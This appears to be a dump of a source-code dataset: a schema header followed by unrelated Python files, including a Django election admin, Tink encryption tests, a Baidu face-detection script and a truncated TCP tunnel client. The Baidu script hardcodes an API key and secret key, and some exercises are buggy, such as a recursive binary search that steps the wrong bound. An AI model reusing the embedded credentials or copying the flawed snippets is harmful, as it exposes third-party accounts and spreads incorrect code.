blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
281
content_id
stringlengths
40
40
detected_licenses
listlengths
0
57
license_type
stringclasses
2 values
repo_name
stringlengths
6
116
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
313 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
18.2k
668M
star_events_count
int64
0
102k
fork_events_count
int64
0
38.2k
gha_license_id
stringclasses
17 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
107 values
src_encoding
stringclasses
20 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
4
6.02M
extension
stringclasses
78 values
content
stringlengths
2
6.02M
authors
listlengths
1
1
author
stringlengths
0
175
0b62db421f1b592394ee367b6221c3e0068a2a38
8477ff7ec00bc8307c51d7b5d0af7c35e0fa4758
/elecciones/admin.py
00a0af34cd8cdf926d224b134d34c7ff55482b93
[]
no_license
ciudadanointeligente/votainteligente-primarias
afc512fb47075cbc31419361a51b9857d9c8a064
11b91990d99b41541b899bfc68d2cbc8fb64a4e1
refs/heads/master
2021-01-10T19:26:04.374281
2013-09-10T20:43:19
2013-09-10T20:43:19
10,316,015
0
0
null
2013-09-10T20:43:20
2013-05-27T14:06:21
JavaScript
UTF-8
Python
false
false
1,770
py
# -*- coding: utf-8 -*- from django.contrib import admin from models import * class ColectivoAdmin(admin.ModelAdmin): model = Colectivo admin.site.register(Colectivo,ColectivoAdmin) class IndiceInline(admin.TabularInline): model = Indice class CandidatoInline(admin.TabularInline): model = Candidato extra = 0 class PreguntaInline(admin.TabularInline): model = Pregunta class RespuestaInline(admin.TabularInline): model = Respuesta readonly_fields = ['candidato'] extra = 0 class EleccionAdmin(admin.ModelAdmin): search_fields = ['nombre', 'candidato__nombre'] inlines = [ CandidatoInline, IndiceInline ] admin.site.register(Eleccion, EleccionAdmin) # action de aprobacion masiva de preguntas def aprobar_preguntas(modeladmin, request, queryset): for obj in queryset: obj.enviar() obj.procesada=True obj.aprobada=True obj.save() aprobar_preguntas.short_description = "Aprobar Preguntas para enviar" class PreguntaAdmin(admin.ModelAdmin): model = Pregunta list_display = ['texto_pregunta', 'aprobada', 'procesada'] ordering = ['aprobada','procesada'] # readonly_fields = ['procesada'] actions = [aprobar_preguntas] inlines = [RespuestaInline] #funcion especial para la aprobación de mail en el admin def save_model(self, request, obj, form, change): if obj.aprobada and not obj.procesada: obj.enviar() obj.procesada=True obj.save() admin.site.register(Pregunta, PreguntaAdmin) class AreaAdmin(admin.ModelAdmin): pass admin.site.register(Area, AreaAdmin) class DatoAdmin(admin.ModelAdmin): pass admin.site.register(Dato, DatoAdmin) class ContactoAdmin(admin.ModelAdmin): search_fields = ['valor', 'candidato__nombre'] admin.site.register(Contacto, ContactoAdmin)
6f22947c146cdb3d4b4e9218a0d8cdabc51ca34a
a211aafcd8ae2369cd3289fca6ced287ee09cc26
/algos_2/sprint_6_hashes/task_e.py
881eb70ff3dc32e6e169dd04b5e31c413aba9309
[]
no_license
vitt0ri0/yalgorithms
562d27449bbc0907c37d632b6eff4d5dbf9da208
1ff6bdc92b61baf03463f299e62c6199d05be040
refs/heads/master
2023-03-21T21:07:02.339838
2021-03-21T13:00:43
2021-03-21T13:00:43
287,198,070
1
0
null
null
null
null
UTF-8
Python
false
false
932
py
def task_e(arr): if len(arr) < 2: return 0 prev1 = arr[0] prev2 = None counter = 0 i = 1 mmax = 0 while i < len(arr): el = arr[i] el2 = arr[i-1] if counter: a = (el, el2) == (prev2, prev1) b = (el, el2) == (prev1, prev2) if a or b: counter += 1 prev2 = el prev1 = el2 i += 1 else: counter = 0 prev1 = el elif el != prev1: counter = 1 prev2 = prev1 prev1 = el i += 1 else: prev1 = el if counter > mmax: mmax = counter i += 1 return mmax if __name__ == '__main__': arr = [1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0] n = input() arr = list(map(int, input().split())) res = task_e(arr) print(res)
222b65cae3e331d1bb9d612840a859b2b8569ee0
238eef9423ef2a909d4531bb70b02afda7b25a38
/sutils/logger.py
33e816e792fd1f10ed271bc0cadfd1b99d080cd0
[]
no_license
sunqiang85/spytorch_v2
7f8f2209e5c6bc266484a6eebc5992d7accc3616
635c18cf2dd56bd92079fe761c70e73743a7890a
refs/heads/master
2021-05-21T14:51:52.986344
2020-04-03T11:13:57
2020-04-03T11:13:57
252,686,933
0
0
null
null
null
null
UTF-8
Python
false
false
511
py
from torch.utils.tensorboard import SummaryWriter import logging class Logger(): def __init__(self, __C): self.__C = __C self.tensorboard = SummaryWriter(__C.tensorboard_path) self.filelogger = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO) fh = logging.FileHandler(__C.log_path, mode='w') formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s") self.filelogger.addHandler(fh)
3e119cfa6d182283fd4105948f57cc3949392715
f6cadae90eb8fa3766acbb00a6c65fd2dfb3cb8d
/source/aiocomments/views/user_requests.py
5a2aab955d11fec38b9d07f0c05db87df8cf20f5
[]
no_license
RTyy/aiocomments
e6d3883777116a81653f12f498473883cebecbc4
2cb470462dbc1eaafbad1453f8f9050dc33d2412
refs/heads/master
2020-05-27T21:26:26.497154
2017-07-10T09:02:01
2017-07-10T09:02:01
94,754,607
0
0
null
null
null
null
UTF-8
Python
false
false
7,798
py
"""User Requests Controller.""" import aiofiles import trafaret as t from aiohttp.web import StreamResponse, FileResponse from datetime import datetime from core.exceptions import CoreException from core.db import acquire_connection from ..consumers import DlResponseConsumer from ..models import UserDlRequest, DlRequest, Comment, Instance, EventLog @acquire_connection async def get_user_dlrequests(request, db): """Return a list of previously created user request.""" # use trafaret as validator trafaret = t.Dict({ t.Key('user_id'): t.Int, }) try: req = trafaret.check(request.match_info) requests = DlRequest.list(db).raw.select( DlRequest.id, DlRequest.itype_id, DlRequest.i_id, DlRequest.author_id, DlRequest.start, DlRequest.end, DlRequest.fmt, DlRequest.created) \ .filter( UserDlRequest.user_id == req['user_id']) \ .order_by(UserDlRequest.created.desc()) return await requests except t.DataError as e: raise CoreException(400, 'Bad Request', e.as_dict()) @acquire_connection async def download(request, db): """Prepare and return report according to request params.""" # use trafaret as validator trafaret = t.Dict({ t.Key('user_id'): t.Int, t.Key('start', optional=True, default=None): (t.Int | t.Null), t.Key('end', optional=True, default=None): (t.Int | t.Null), t.Key('author_id', optional=True, default=None): (t.Int | t.Null), t.Key('i_id', optional=True, default=None): (t.Int | t.Null), # 0 or unspecified means "comment" t.Key('itype_id', optional=True, default=0): t.Int, }) trafaret_format = t.Dict({ # t.Key('format', optional=True, default='xml'): t.Enum('xml'), t.Key('format', optional=True, default='xml'): lambda d: \ DlRequest.Format.by_verbose(d, DlRequest.Format.XML), }) try: req = trafaret.check(request.query) if not req['i_id'] and not req['author_id']: raise CoreException(400, 'Bad Request', { '_': 'Instance or Author should be specidied.'}) req_fmt = trafaret_format.check(request.match_info).get('format') root = None # try to get previously stored request try: # make a filter flt = DlRequest.fmt == req_fmt if req['i_id']: # make sure that requested instance exists. if req['itype_id'] == 0: root = await Comment.list(db).get( Comment.id == req['i_id']) else: root = await Instance.list(db).get( (Instance.i_id == req['i_id']) & (Instance.itype_id == req['itype_id'])) flt &= (DlRequest.i_id == req['i_id']) \ & (DlRequest.itype_id == req['itype_id']) if req['author_id']: flt &= DlRequest.author_id == req['author_id'] if req['start'] is not None: req['start'] = datetime.fromtimestamp(req['start'] / 1000) flt &= (DlRequest.start == req['start']) if req['end'] is not None: req['end'] = datetime.fromtimestamp(req['end'] / 1000) flt &= (DlRequest.end == req['end']) dlreq = await DlRequest.list(db).get(flt) # get user download request try: udlreq = await UserDlRequest.list(db).get( (UserDlRequest.user_id == req['user_id']) & (UserDlRequest.dlrequest_id == dlreq.id) ) except UserDlRequest.DoesNotExist: # crate a new one udlreq = UserDlRequest(user_id=req['user_id'], dlrequest_id=dlreq.id) await udlreq.save(db) except DlRequest.DoesNotExist: # create both new download request and its link to the user dlreq = DlRequest(**req) dlreq.fmt = req_fmt await dlreq.save(db, request.app['fs']) udlreq = UserDlRequest(user_id=req['user_id'], dlrequest_id=dlreq.id) await udlreq.save(db) except (Comment.DoesNotExist, Instance.DoesNotExist): raise CoreException(404, 'Root Instance Not Found') # proceed with request validation # make sure there are no events that could affect # previously generated report if dlreq.state == DlRequest.State.VALID: # build events query based on DlRequest params events = EventLog.list(db).filter(EventLog.e_date > dlreq.created) if root is not None: events = events.filter(EventLog.tree_id == root.tree_id) if dlreq.author_id: events = events.filter(EventLog.author_id == dlreq.author_id) if dlreq.start: if dlreq.end: events = events.filter( EventLog.comment_cdate.between(dlreq.start, dlreq.end)) else: events = events.filter( EventLog.comment_cdate >= dlreq.start) elif dlreq.end: events = events.filter(EventLog.comment_cdate <= dlreq.end) # check the number of events which affected # previously generated report if await events.count() > 0: # mark report invalid if there at least one event found dlreq.state = DlRequest.State.INVALID await dlreq.save(db, request.app['fs']) # prepare requested report report_filename = 'report' report_filepath = request.app['fs'].path(dlreq.filename) # if req['author_id']: # report_filename += '-user%s' % req['author_id'] # if req['i_id']: # report_filename += '-comment%s' % i_id if req['type_id'] == 0 \ # else '-instance%s(%s)' % (req['i_id'], req['itype_id']) headers = { 'Content-Type': 'text/xml', 'Content-Disposition': 'attachment; filename="%s.xml"' % report_filename, 'Cache-Control': 'no-cache', 'Connection': 'keep-alive' } # is_valid flag telling us if requested report was generated # and if it's still valid (there were no updates or new comments # created within a period specified by the request) if dlreq.state == DlRequest.State.VALID: # return a pure FileResponse return FileResponse(report_filepath, headers=headers) else: stream = StreamResponse(status=200, reason='OK', headers=headers) # stream.enable_chunked_encoding() await stream.prepare(request) # here we will await for the message from the report builder # over local pubsub service await DlResponseConsumer(dlreq.id, loop=request.app.loop).run() # stream generated report file async with aiofiles.open(request.app['fs'].path(dlreq.filename), 'r') as fd: while True: chunk = await fd.read(1024) if not chunk: break stream.write(chunk.encode('utf-8')) # yield to the scheduler so other processes do stuff. await stream.drain() await stream.write_eof() return stream except t.DataError as e: raise CoreException(400, 'Bad Request', e.as_dict())
416b6e3bfd65de33b7549956af8ebdb24642ebc6
6cfcf1b6ef7afe49eebe4edbd21184fc914c7755
/Exercicios/ex024.py
a340c88d759c0fc679b1a895d2a9b21fbe5500a7
[]
no_license
mmagalha/Python
254df310a2a4f79258638321094296860bf4097a
95cbcc57c6f26d37954bc8835da885d32b4e607e
refs/heads/master
2021-05-02T07:42:56.872807
2018-02-12T01:05:02
2018-02-12T01:05:02
118,944,792
0
0
null
null
null
null
UTF-8
Python
false
false
208
py
#Exercício Python 024: Crie um programa que leia o nome de uma cidade diga se ela começa ou não com o nome "SANTO". cidade = str(input("Digite o nome da sua cidade: ")).upper() print(cidade[:5] == "SANTO")
1b0b318977f920b37ea3424f58bc5c6b179df0c8
1eaf99e876b5fc5b05de1b41014dca6efc6601f1
/cupcake.py
23923a460a24f77dd8a4d3e9eda0372799595992
[]
no_license
puspita-sahoo/codechef_program
5466dfc675e11b276a76d30fd8a3787fa106590a
1fae1e9b89ebedb963216e5e79a673716e8b5cc9
refs/heads/master
2023-08-21T15:01:42.804814
2021-09-10T17:47:26
2021-09-10T17:47:26
405,164,524
0
0
null
null
null
null
UTF-8
Python
false
false
94
py
T = int(input()) for i in range(T): N = int(input()) ap = (N//2) + 1 print(ap)
df0300b9ae066ae31618798f45525e2480426413
7a1b08c64b29522d4bbb913475275c1bc8ad61a4
/patient_agenda/events/doc_events/conver_value.py
afcdc7008de591882958f1eb59c25de32cecb141
[ "MIT" ]
permissive
erichilarysmithsr/time-track
8f84d4cc92cebaedce550b3741982d204e734a6c
dc0a7b63c937d561309f9b1c84af65fb581a8e18
refs/heads/master
2023-03-27T08:07:46.717221
2021-03-30T16:45:50
2021-03-30T16:45:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,695
py
#!/usr/bin/python3 # -*- coding:utf-8 -*- import os import json import subprocess try: with open('./patient_agenda/events/doc_events/patient_rdv.json') as file: data=json.load(file) except FileNotFoundError as fileout: print("File 1 patient_rdv.json not created", fileout) for value in data: print(value) data_list1 = [] for value in data: data_list1.append(value[1]) data_day = data_list1[0] data_month = data_list1[1] data_year = data_list1[2] try: if data_day < 10: extraday = '0' +''+ str(data_day) elif data_day >= 10: extraday = str(data_day) else: pass except ValueError as valout: print("Value of day is a problem", valout) try: if data_month < 10: extramounth = '0' +''+ str(data_month) elif data_month >= 10: extramounth = str(data_month) else: pass except ValueError as valout: print("Value of mounth is a problem", valout) # initword = "Appointment set for :" # initword +' '+ final_data = extraday +'/'+ extramounth +'/'+ str(data_year) +' :' print(final_data) try: if os.path.getsize('./patient_agenda/events/doc_events/fix_agenda/patient_value.json'): print("+ File 'value' exist !") with open('./patient_agenda/events/doc_events/fix_agenda/patient_value.json','w') as partytime: json.dump(final_data, partytime) except FileNotFoundError as msg: print("File doesn't exist, but it has been created !") with open('./patient_agenda/events/doc_events/fix_agenda/patient_value.json','w') as partyleft: json.dump(final_data, partyleft) subprocess.call('./patient_agenda/events/doc_events/fix_agenda/extend_agenda.py')
d1e21770e28bf318bb9670ca416bde39191d4f7d
6e0108c11132e63c81adbfab4309011b1f9f6dda
/tests/python/extra/clear_leaves.py
4d2f1e3a58a3fcb2fd07655efd2646b28d0a5f5f
[ "Apache-2.0" ]
permissive
scottdonaldau/ledger-qrl
c28a614ae52c44e53947e444abf078ec27041815
7a3b933b84065b9db2b775d50205efcdbed2399e
refs/heads/master
2020-04-12T07:12:25.687015
2018-12-19T02:55:43
2018-12-19T02:55:43
162,360,262
0
0
Apache-2.0
2018-12-19T00:15:27
2018-12-19T00:15:27
null
UTF-8
Python
false
false
269
py
from pyledgerqrl.ledgerqrl import * dev = LedgerQRL() start = time.time() for i in range(256): data = bytearray([i]) + bytearray.fromhex("00" * 32) answer = dev.send(INS_TEST_WRITE_LEAF, data) assert len(answer) == 0 answer = dev.send(INS_TEST_PK_GEN_1)
020e659363902ab2305fccbb021c6b361e707718
8db243a61d43e133aac01a67294d26df3381a8f5
/Recursion/BinarySearch_Recursion.py
2cca8e334ec83ad6effa671540e35b2e6d6a31c0
[]
no_license
Jyoti1706/Algortihms-and-Data-Structures
ccdd93ad0811585f9b3e1e9f639476ccdf15a359
3458a80e02b9957c9aeaf00bf691cc7aebfd3bff
refs/heads/master
2023-06-21T18:07:13.419498
2023-06-16T17:42:55
2023-06-16T17:42:55
149,984,584
0
0
null
null
null
null
UTF-8
Python
false
false
463
py
def Binary_Search_Recursion(arr, lo, hi, target): if lo > hi: return -1 mid = (lo+hi)//2 if arr[mid] == target: return mid elif arr[mid]>target: hi = mid-1 return Binary_Search_Recursion(arr, lo, hi, target) else: lo=lo+1 return Binary_Search_Recursion(arr, lo, hi, target) arr = [-1,0,1,2,3,4,7,9,10,20] target = 10 print(f"index of target is :: {Binary_Search_Recursion(arr,0, len(arr),10)}")
e4f2ffff2bf16986aa3131d71811dfb973f65ef7
9d126bd1569104d953f59005cae73197678c1566
/n-apekatter.py
35d7c584585e02c3aa2ee4b038a0ad99058296a4
[]
no_license
supermons/n-apekatter
75e84a9b5b9b3833e06b8a8bbdd00cb8716a4737
db78878e3e8913117e9b3a04e36ad67b686e9844
refs/heads/master
2020-04-01T07:54:38.056944
2018-10-14T19:35:57
2018-10-14T19:35:57
153,009,295
1
0
null
null
null
null
UTF-8
Python
false
false
496
py
n = 5 while n != 0: if n == 1: print("En liten apekatt sitter i ett tre") print("Den erter krokodillen: 'Du kan ikke ta meg ned'") else: print(str(n) + " små apekatter sitter i ett tre") print("De erter krokodillen: 'Du kan ikke ta oss ned'") print("Sa kom krokodillen, så diger og så svær og slurp!") n = n - 1 if n == 0: print("Da var det ingen apekatter der") else: print("Så var de bare " + str(n) + " apekatter der") print("\n")
55559c3ca1ad5ff7d80c5cf736dab7da2c5d72a7
dfff816642f4e1afeab268f441906a6d811d3fb4
/polling_stations/apps/data_collection/management/commands/import_newham.py
d1463f346e39dd465ff77e53dbf91e637072ccae
[]
permissive
mtravis/UK-Polling-Stations
2c07e03d03959492c7312e5a4bfbb71e12320432
26e0331dc29253dc436a0462ffaa01e974c5dc52
refs/heads/master
2020-05-14T18:36:31.501346
2019-04-17T12:54:57
2019-04-17T12:54:57
181,912,382
0
0
BSD-3-Clause
2019-04-17T14:48:26
2019-04-17T14:48:26
null
UTF-8
Python
false
false
1,255
py
from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter class Command(BaseXpressDemocracyClubCsvImporter): council_id = "E09000025" addresses_name = "local.2018-05-03/Version 2/LBNewham Democracy_Club__03May2018.TSV" stations_name = "local.2018-05-03/Version 2/LBNewham Democracy_Club__03May2018.TSV" elections = ["local.2018-05-03", "mayor.newham.2018-05-03"] csv_delimiter = "\t" def address_record_to_dict(self, record): if record.addressline6 == "E16 1EF": return None if record.property_urn == "10090852604": return None if record.property_urn == "10034510101": rec = super().address_record_to_dict(record) rec["postcode"] = "E13 8NA" return rec if record.addressline6 == "E16 1XF": return None if record.property_urn == "10090756946": rec = super().address_record_to_dict(record) rec["postcode"] = "E7 9AW" return rec if record.property_urn == "10023994990": rec = super().address_record_to_dict(record) rec["postcode"] = "E7 9AW" return rec return super().address_record_to_dict(record)
0048953dec39f492a91c8bdde7a9ddaca57537a1
5d4753b7e463827c9540e982108de22f62435c3f
/python/tink/daead/_deterministic_aead_wrapper_test.py
b59d11dca3c7331a23581b856195197dfeb49b72
[ "Apache-2.0" ]
permissive
thaidn/tink
8c9b65e3f3914eb54d70847c9f56853afd051dd3
2a75c1c3e4ef6aa1b6e29700bf5946b725276c95
refs/heads/master
2021-07-25T02:02:59.839232
2021-02-10T17:21:31
2021-02-10T17:22:01
337,815,957
2
0
Apache-2.0
2021-02-10T18:28:20
2021-02-10T18:28:20
null
UTF-8
Python
false
false
6,074
py
# Copyright 2019 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tink.python.tink.aead_wrapper.""" from __future__ import absolute_import from __future__ import division # Placeholder for import for type annotations from __future__ import print_function from absl.testing import absltest from absl.testing import parameterized import tink from tink import daead from tink.testing import keyset_builder DAEAD_TEMPLATE = daead.deterministic_aead_key_templates.AES256_SIV RAW_DAEAD_TEMPLATE = keyset_builder.raw_template(DAEAD_TEMPLATE) def setUpModule(): daead.register() class AeadWrapperTest(parameterized.TestCase): @parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE]) def test_encrypt_decrypt(self, template): keyset_handle = tink.new_keyset_handle(template) primitive = keyset_handle.primitive(daead.DeterministicAead) ciphertext = primitive.encrypt_deterministically( b'plaintext', b'associated_data') self.assertEqual( primitive.decrypt_deterministically(ciphertext, b'associated_data'), b'plaintext') @parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE]) def test_decrypt_unknown_ciphertext_fails(self, template): unknown_handle = tink.new_keyset_handle(template) unknown_primitive = unknown_handle.primitive(daead.DeterministicAead) unknown_ciphertext = unknown_primitive.encrypt_deterministically( b'plaintext', b'associated_data') keyset_handle = tink.new_keyset_handle(template) primitive = keyset_handle.primitive(daead.DeterministicAead) with self.assertRaises(tink.TinkError): primitive.decrypt_deterministically(unknown_ciphertext, b'associated_data') @parameterized.parameters([DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE]) def test_decrypt_wrong_associated_data_fails(self, template): keyset_handle = tink.new_keyset_handle(template) primitive = keyset_handle.primitive(daead.DeterministicAead) ciphertext = primitive.encrypt_deterministically(b'plaintext', b'associated_data') with self.assertRaises(tink.TinkError): primitive.decrypt_deterministically(ciphertext, b'wrong_associated_data') @parameterized.parameters([(DAEAD_TEMPLATE, DAEAD_TEMPLATE), (RAW_DAEAD_TEMPLATE, DAEAD_TEMPLATE), (DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE), (RAW_DAEAD_TEMPLATE, RAW_DAEAD_TEMPLATE)]) def test_encrypt_decrypt_with_key_rotation(self, template1, template2): builder = keyset_builder.new_keyset_builder() older_key_id = builder.add_new_key(template1) builder.set_primary_key(older_key_id) p1 = builder.keyset_handle().primitive(daead.DeterministicAead) newer_key_id = builder.add_new_key(template2) p2 = builder.keyset_handle().primitive(daead.DeterministicAead) builder.set_primary_key(newer_key_id) p3 = builder.keyset_handle().primitive(daead.DeterministicAead) builder.disable_key(older_key_id) p4 = builder.keyset_handle().primitive(daead.DeterministicAead) self.assertNotEqual(older_key_id, newer_key_id) # p1 encrypts with the older key. So p1, p2 and p3 can decrypt it, # but not p4. ciphertext1 = p1.encrypt_deterministically(b'plaintext', b'ad') self.assertEqual(p1.decrypt_deterministically(ciphertext1, b'ad'), b'plaintext') self.assertEqual(p2.decrypt_deterministically(ciphertext1, b'ad'), b'plaintext') self.assertEqual(p3.decrypt_deterministically(ciphertext1, b'ad'), b'plaintext') with self.assertRaises(tink.TinkError): _ = p4.decrypt_deterministically(ciphertext1, b'ad') # p2 encrypts with the older key. So p1, p2 and p3 can decrypt it, # but not p4. ciphertext2 = p2.encrypt_deterministically(b'plaintext', b'ad') self.assertEqual(p1.decrypt_deterministically(ciphertext2, b'ad'), b'plaintext') self.assertEqual(p2.decrypt_deterministically(ciphertext2, b'ad'), b'plaintext') self.assertEqual(p3.decrypt_deterministically(ciphertext2, b'ad'), b'plaintext') with self.assertRaises(tink.TinkError): _ = p4.decrypt_deterministically(ciphertext2, b'ad') # p3 encrypts with the newer key. So p2, p3 and p4 can decrypt it, # but not p1. ciphertext3 = p3.encrypt_deterministically(b'plaintext', b'ad') with self.assertRaises(tink.TinkError): _ = p1.decrypt_deterministically(ciphertext3, b'ad') self.assertEqual(p2.decrypt_deterministically(ciphertext3, b'ad'), b'plaintext') self.assertEqual(p3.decrypt_deterministically(ciphertext3, b'ad'), b'plaintext') self.assertEqual(p4.decrypt_deterministically(ciphertext3, b'ad'), b'plaintext') # p4 encrypts with the newer key. So p2, p3 and p4 can decrypt it, # but not p1. ciphertext4 = p4.encrypt_deterministically(b'plaintext', b'ad') with self.assertRaises(tink.TinkError): _ = p1.decrypt_deterministically(ciphertext4, b'ad') self.assertEqual(p2.decrypt_deterministically(ciphertext4, b'ad'), b'plaintext') self.assertEqual(p3.decrypt_deterministically(ciphertext4, b'ad'), b'plaintext') self.assertEqual(p4.decrypt_deterministically(ciphertext4, b'ad'), b'plaintext') if __name__ == '__main__': absltest.main()
f487b32d187d8c46617f40bfa556df73ae0f4374
f9d564f1aa83eca45872dab7fbaa26dd48210d08
/huaweicloud-sdk-iotanalytics/huaweicloudsdkiotanalytics/v1/model/list_batch_jobs_response.py
c820f1d45d59dffa07e947b9b3b4e80b79e3084e
[ "Apache-2.0" ]
permissive
huaweicloud/huaweicloud-sdk-python-v3
cde6d849ce5b1de05ac5ebfd6153f27803837d84
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
refs/heads/master
2023-09-01T19:29:43.013318
2023-08-31T08:28:59
2023-08-31T08:28:59
262,207,814
103
44
NOASSERTION
2023-06-22T14:50:48
2020-05-08T02:28:43
Python
UTF-8
Python
false
false
3,929
py
# coding: utf-8 import six from huaweicloudsdkcore.sdk_response import SdkResponse from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization class ListBatchJobsResponse(SdkResponse): """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ sensitive_list = [] openapi_types = { 'count': 'int', 'jobs': 'list[Job]' } attribute_map = { 'count': 'count', 'jobs': 'jobs' } def __init__(self, count=None, jobs=None): """ListBatchJobsResponse The model defined in huaweicloud sdk :param count: 定时作业总个数。 :type count: int :param jobs: :type jobs: list[:class:`huaweicloudsdkiotanalytics.v1.Job`] """ super(ListBatchJobsResponse, self).__init__() self._count = None self._jobs = None self.discriminator = None if count is not None: self.count = count if jobs is not None: self.jobs = jobs @property def count(self): """Gets the count of this ListBatchJobsResponse. 定时作业总个数。 :return: The count of this ListBatchJobsResponse. :rtype: int """ return self._count @count.setter def count(self, count): """Sets the count of this ListBatchJobsResponse. 定时作业总个数。 :param count: The count of this ListBatchJobsResponse. :type count: int """ self._count = count @property def jobs(self): """Gets the jobs of this ListBatchJobsResponse. :return: The jobs of this ListBatchJobsResponse. :rtype: list[:class:`huaweicloudsdkiotanalytics.v1.Job`] """ return self._jobs @jobs.setter def jobs(self, jobs): """Sets the jobs of this ListBatchJobsResponse. :param jobs: The jobs of this ListBatchJobsResponse. :type jobs: list[:class:`huaweicloudsdkiotanalytics.v1.Job`] """ self._jobs = jobs def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: if attr in self.sensitive_list: result[attr] = "****" else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" import simplejson as json if six.PY2: import sys reload(sys) sys.setdefaultencoding("utf-8") return json.dumps(sanitize_for_serialization(self), ensure_ascii=False) def __repr__(self): """For `print`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ListBatchJobsResponse): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
90915e0a41438c2373e73cc3ba2e72afdaca1b45
1ee6f343c9e7173b89993e3acca185f45a6ffda7
/client_side/main.py
a69c15b1bca5a629f2b1c324619717dc4400dfdc
[ "MIT" ]
permissive
gmillia/IRC
351a8352112a65fde76ab89addc2d18658f13af4
4c7f099ada266830d47c558c37078b107789c48d
refs/heads/master
2022-09-18T21:54:30.494942
2020-06-01T01:46:43
2020-06-01T01:46:43
265,183,836
0
0
null
null
null
null
UTF-8
Python
false
false
109
py
from client import Client if __name__ == "__main__": client_instance = Client() client_instance.menu()
f7a133da42b483bbd6721ea185ae86310461ffcc
1eb2d7d2a6e945a9bc487afcbc51daefd9af02e6
/algorithm/zhang/baiduface.py
aae543c80ba05cfedc089fe690d2f4beb4954ca2
[]
no_license
fengges/eds
11dc0fdc7a17b611af1f61894f497ad443439bfe
635bcf015e3ec12e96949632c546d29fc99aee31
refs/heads/master
2021-06-20T04:43:02.019309
2019-06-20T12:55:26
2019-06-20T12:55:26
133,342,023
0
3
null
null
null
null
UTF-8
Python
false
false
1,255
py
import os,time from aip import AipFace from PIL import Image, ImageDraw """ 你的 APPID AK SK """ APP_ID = '10909628' API_KEY = 'sInxLcVbCLSg6rNXVDXR4sHD' SECRET_KEY = 'e2zgNstc7GEhhvFOfCVKDW2itVf0iID4' filepath ="pic" client = AipFace(APP_ID, API_KEY, SECRET_KEY) def get_file_content(filePath): with open(filePath, 'rb') as fp: return fp.read() pathDir = os.listdir(filepath) for path in pathDir: pic=filepath+'/'+path pic3="pic3/"+path image = get_file_content(pic) """ 调用人脸检测 """ client.detect(image) """ 如果有可选参数 """ options = {} options["max_face_num"] = 10 options["face_fields"] = "age" """ 带参数调用人脸检测 """ res=client.detect(image, options) try: result=res["result"] except: print(res) img = Image.open(pic3) img_d = ImageDraw.Draw(img) for f in result: face_rectangle = f["location"] img_d.rectangle((face_rectangle['left'], face_rectangle['top'], face_rectangle['left'] + face_rectangle['width'], face_rectangle['top'] + face_rectangle['height']), outline="red") img.save(pic3) img.close() print("sleep") time.sleep(2)
e8773eb18e0bca70b0803491328944b2739f03b1
02882742ef02d83d52f48354b44d600df3b7aa47
/TCPTunnelClient.py
20a0b790fdf47743b956eb0a8d1efeebcc0e9dbc
[]
no_license
BIDGroup/TCPTunnel
c02c1c46304fe8156815f9a8e4408875de57d533
a6b271b13f46156c82283106b3f69b23de4f7f89
refs/heads/master
2020-03-31T03:28:54.249992
2018-10-05T09:39:18
2018-10-05T09:39:18
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,154
py
import socket import sys import time import threading def heartCheck(s): print "Heart Pack Thread Start" while True: try: data = s.recv(128) if not data: print "Heart Pack Tunnel Break" break except Exception: print "Heart Pack Tunnel Break" break def link(s1,s2): while True: try: data = s1.recv(10240) if not data: s1.close(); s2.close(); break; s2.send(data) except Exception: s1.close() s2.close() break print "### TCPTunnelClient ###" print "Please Enter Local Server Port:" localPort = int(raw_input()) localAddress = ('0.0.0.0', localPort) print "Please Enter Re-Link Server Address:" reLinkIP = raw_input() print "Please Enter Re-Link Server Port:" reLinkAddress = (reLinkIP, int(raw_input())) print "Please Enter Remote Server Address:" remoteIP = raw_input() print "Please Enter Remote Server Port:" remotePort = int(raw_input()) remoteAddress = (remoteIP, remotePort) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) s.bind(localAddress) s.connect(remoteAddress) s.send("Hello") msg = s.recv(512) print "Successful Link Remote Server!" print "Get Link Address:", msg s.close() print "Start Local Server" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) s.bind(localAddress) s.listen(localPort) ss, addr = s.accept() print "Heart Pack Tunnel Build" t1 = threading.Thread(target = heartCheck, args=(ss,)) t1.setDaemon(True) t1.start() 